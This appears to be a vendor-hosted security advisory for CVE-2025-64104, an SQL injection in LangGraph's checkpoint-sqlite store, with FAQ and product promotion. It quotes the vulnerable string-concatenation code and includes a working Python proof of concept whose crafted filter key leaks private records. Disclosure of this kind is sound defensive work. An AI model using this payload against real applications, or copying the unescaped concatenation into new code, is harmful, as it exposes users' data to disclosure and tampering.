Summary
LangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls.
Details
/langgraph/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py
The key portion of the JSON path is concatenated directly into the SQL string without sanitation. There's a few different occurrences within the file.
filter_conditions.append(
"json_extract(value, '$."
+ key # <-- Directly concatenated, no escaping!
+ "') = '"
+ value.replace("'", "''") # <-- Only value is escaped
+ "'"
)
Who is affected
This issue affects only developers or projects that directly use the checkpoint-sqlite store.
An application is vulnerable only if it:
- Instantiates the
SqliteStorefrom thecheckpoint-sqlitepackage, and - Builds the
filterargument using keys derived from untrusted or user-supplied input (such as query parameters, request bodies, or other external data).
If filter keys are static or validated/allowlisted before being passed to the store, the risk does not apply.
Note: users of LangSmith deployments (previously known as LangGraph Platform) are not affected as those deployments rely on a different checkpointer implementation.
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
#!/usr/bin/env python3
"""Minimal SQLite Key Injection POC for LangGraph"""
from langgraph.store.sqlite import SqliteStore
# Create store with test data
with SqliteStore.from_conn_string(":memory:") as store:
store.setup()
# Add public and private documents
store.put(("docs",), "public", {"access": "public", "data": "public info"})
store.put(("docs",), "private", {"access": "private", "data": "secret", "password": "123"})
# Normal query - returns 1 public document
normal = store.search(("docs",), filter={"access": "public"})
print(f"Normal query: {len(normal)} docs")
# SQL injection via malicious key
malicious_key = "access') = 'public' OR '1'='1' OR json_extract(value, '$."
injected = store.search(("docs",), filter={malicious_key: "dummy"})
print(f"Injected query: {len(injected)} docs")
for doc in injected:
if doc.value.get("access") == "private":
print(f"LEAKED: {doc.value}")
Impact
Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access. Typical impact: data disclosure or modification.
CVE-2025-64104 has a CVSS score of 7.3 (High). The vector is requires local access, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.0.11); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-64104? CVE-2025-64104 is a high-severity SQL injection vulnerability in langgraph-checkpoint-sqlite (pip), affecting versions <= 2.0.10. It is fixed in 2.0.11. Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access.
- How severe is CVE-2025-64104? CVE-2025-64104 has a CVSS score of 7.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of langgraph-checkpoint-sqlite are affected by CVE-2025-64104? langgraph-checkpoint-sqlite (pip) versions <= 2.0.10 is affected.
- Is there a fix for CVE-2025-64104? Yes. CVE-2025-64104 is fixed in 2.0.11. Upgrade to this version or later.
- Is CVE-2025-64104 exploitable, and should I be worried? Whether CVE-2025-64104 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-64104 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-64104? Upgrade
langgraph-checkpoint-sqliteto 2.0.11 or later.